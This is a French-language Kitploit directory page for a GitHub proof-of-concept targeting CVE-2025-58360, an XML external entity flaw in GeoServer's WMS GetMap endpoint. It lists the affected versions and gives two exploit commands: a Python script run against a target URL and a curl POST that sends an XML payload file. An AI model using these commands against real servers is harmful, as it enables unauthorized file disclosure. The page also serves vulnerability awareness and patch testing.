Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-58360 — XXE via un point de terminaison spécifique /geoserver/wms opération GetMap - Geoserver | Kitploit
Outils/GitHubGitHub/quyenheu/cve-2025-58360
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubquyenheu/cve-2025-58360

CVE-2025-58360

XXE via un point de terminaison spécifique /geoserver/wms opération GetMap - Geoserver

Voir le dépôt
6il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-58360

De la version 2.26.0 jusqu'à avant la version 2.26.2 et dans les versions antérieures à la 2.25.6, une vulnérabilité de type Entité Externe XML (XXE) a été identifiée. L'application accepte des entrées XML via un point de terminaison spécifique /geoserver/wms opération GetMap

image

Exploit1:

root@kitploit:~
python3 CVE-2025-58360 -u http://example.com

Exploit2:

root@kitploit:~
curl -X POST "http://example.com/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" -H "Content-Type: application/xml" --data-binary @payload.xml -o output.png
Télécharger l’outil